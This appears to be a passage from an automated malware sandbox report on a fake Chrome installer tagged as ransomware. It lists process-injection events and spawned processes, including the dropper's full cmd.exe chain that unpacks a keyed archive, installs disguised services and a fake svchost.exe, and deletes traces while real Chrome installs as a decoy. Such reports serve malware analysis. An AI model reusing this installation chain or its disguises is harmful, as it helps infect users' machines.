N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Smart\setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2064 wrote to memory of 1832 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 2064 wrote to memory of 1832 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\srtasks.exe
PID 2064 wrote to memory of 3512 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2064 wrote to memory of 3512 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2064 wrote to memory of 3512 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3512 wrote to memory of 2524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 3512 wrote to memory of 2524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 3512 wrote to memory of 2524 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 2524 wrote to memory of 2988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2524 wrote to memory of 2988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2524 wrote to memory of 2988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2524 wrote to memory of 3300 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 2524 wrote to memory of 3300 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 2524 wrote to memory of 3300 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 2524 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 2524 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 5088 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 5088 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 5088 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 2524 wrote to memory of 3800 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 2524 wrote to memory of 3800 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 2524 wrote to memory of 2500 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 2524 wrote to memory of 2500 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 2524 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2524 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2524 wrote to memory of 1572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2524 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 2524 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 2524 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 2524 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 2160 wrote to memory of 4060 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 2160 wrote to memory of 4060 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 2160 wrote to memory of 4060 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1140 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 1140 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 1140 wrote to memory of 804 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 2524 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 2524 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 2524 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 1520 wrote to memory of 3832 N/A C:\ProgramData\setup\setup.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe
PID 1520 wrote to memory of 3832 N/A C:\ProgramData\setup\setup.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe
PID 1520 wrote to memory of 3832 N/A C:\ProgramData\setup\setup.exe C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe
PID 3832 wrote to memory of 4820 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 3832 wrote to memory of 4820 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 3832 wrote to memory of 4820 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 4060 wrote to memory of 4696 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 4696 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 4696 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 3048 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 3048 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 3048 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 472 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 472 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 4060 wrote to memory of 472 N/A C:\ProgramData\Smart\setup.exe C:\ProgramData\NVIDIARV\svchost.exe
PID 3832 wrote to memory of 1256 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 3832 wrote to memory of 1256 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 3832 wrote to memory of 1256 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
PID 1256 wrote to memory of 2812 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 1256 wrote to memory of 2812 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 1256 wrote to memory of 568 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 1256 wrote to memory of 568 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 1256 wrote to memory of 968 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 1256 wrote to memory of 968 N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
PID 3832 wrote to memory of 3512 N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Chrome.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 999E5D24FED8004AF3E8170BB1DD2272

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe" /c timeout /nobreak /t 7 & C:\ProgramData\setup\aa.exe x C:\ProgramData\setup\ddd. -key 000000 -f -to C:\ProgramData & C:\ProgramData\Packas\scrok.exe & C:\ProgramData\Smart\TjNkNpAilaYvt.exe install & C:\ProgramData\Smart\TjNkNpAilaYvt.exe install & timeout /nobreak /t 2 & C:\ProgramData\Smart\TjNkNpAilaYvt.exe start & C:\ProgramData\Packas\scrok.exe & del C:\ProgramData\Packas\scrok.exe & C:\ProgramData\setup\setup.exe

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 7

C:\ProgramData\setup\aa.exe

C:\ProgramData\setup\aa.exe x C:\ProgramData\setup\ddd. -key 000000 -f -to C:\ProgramData

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe install

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe install

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 2

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe start

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

"C:\ProgramData\Smart\TjNkNpAilaYvt.exe"

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Smart\setup.exe

"C:\ProgramData\Smart\setup.exe"

C:\ProgramData\setup\setup.exe

C:\ProgramData\setup\setup.exe

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe

C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={9F0C1F44-1C50-396A-483A-08DA4896FF0B}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zMTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zMTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NENBMTBEMUYtQkVDOC00MTA3LUFBQkUtNzYyOERFNDczRTcxfSIgdXNlcmlkPSJ7MTg4MTg1Q0ItMDMzNC00REQ4LUFDNUItMkNCREEwNTA4NDc3fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezQwMENGQUY3LUVDMjctNDZCMS1BQjEyLUYxNjlGNjhGQjkwOX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0NC40NTI5IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjM3MSIgbmV4dHZlcnNpb249IjEuMy4zNi4zMTIiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaWlkPSJ7OUYwQzFGNDQtMUM1MC0zOTZBLTQ4M0EtMDhEQTQ4OTZGRjBCfSI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIyMTU2Ii8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={9F0C1F44-1C50-396A-483A-08DA4896FF0B}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{4CA10D1F-BEC8-4107-AABE-7628DE473E71}"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\133.0.6943.127_chrome_installer.exe

"C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\133.0.6943.127_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\gui3919.tmp"

C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\gui3919.tmp"

C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x294,0x298,0x29c,0x270,0x2a0,0x7ff67d16bed8,0x7ff67d16bee4,0x7ff67d16bef0

C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x294,0x298,0x29c,0x270,0x2a0,0x7ff67d16bed8,0x7ff67d16bee4,0x7ff67d16bef0

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zMTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zMTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NENBMTBEMUYtQkVDOC00MTA3LUFBQkUtNzYyOERFNDczRTcxfSIgdXNlcmlkPSJ7MTg4MTg1Q0ItMDMzNC00REQ4LUFDNUItMkNCREEwNTA4NDc3fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezMwQUE4N0E3LUExNDctNERFQS05NDAwLTc5N0IzRUIyN0E1MX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0NC40NTI5IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMzLjAuNjk0My4xMjciIGFwPSJ4NjQtc3RhYmxlLXN0YXRzZGVmXzEiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iNCIgaWlkPSJ7OUYwQzFGNDQtMUM1MC0zOTZBLTQ4M0EtMDhEQTQ4OTZGRjBCfSIgY29ob3J0PSIxOmd1L2kxOToiIGNvaG9ydG5hbWU9IlN0YWJsZSBJbnN0YWxscyAmYW1wOyBWZXJzaW9uIFBpbnMiPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vZWRnZWRsLm1lLmd2dDEuY29tL2VkZ2VkbC9yZWxlYXNlMi9jaHJvbWUvYXUybjMyaDNobmNuYzVrY241Mnd4YXh6eGFfMTMzLjAuNjk0My4xMjcvMTMzLjAuNjk0My4xMjdfY2hyb21lX2luc3RhbGxlci5leGUiIGRvd25sb2FkZWQ9IjExODkyOTI2NCIgdG90YWw9IjExODkyOTI2NCIgZG93bmxvYWRfdGltZV9tcz0iMTczOTEiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5NjcwNyIgc291cmNlX3VybF9pbmRleD0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjcxOSIgZG93bmxvYWRfdGltZV9tcz0iMTg1MTUiIGRvd25sb2FkZWQ9IjExODkyOTI2NCIgdG90YWw9IjExODkyOTI2NCIgaW5zdGFsbF90aW1lX21zPSIzMDAxNiIvPjwvYXBwPjwvcmVxdWVzdD4

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe" -Embedding

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x200,0x224,0x228,0x1d0,0x22c,0x7ffd5aa4fff8,0x7ffd5aa50004,0x7ffd5aa50010

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2036,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2032 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1588,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2560 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2944,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2964,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3852,i,14610993034226589236,16736531496264194284,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3864 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

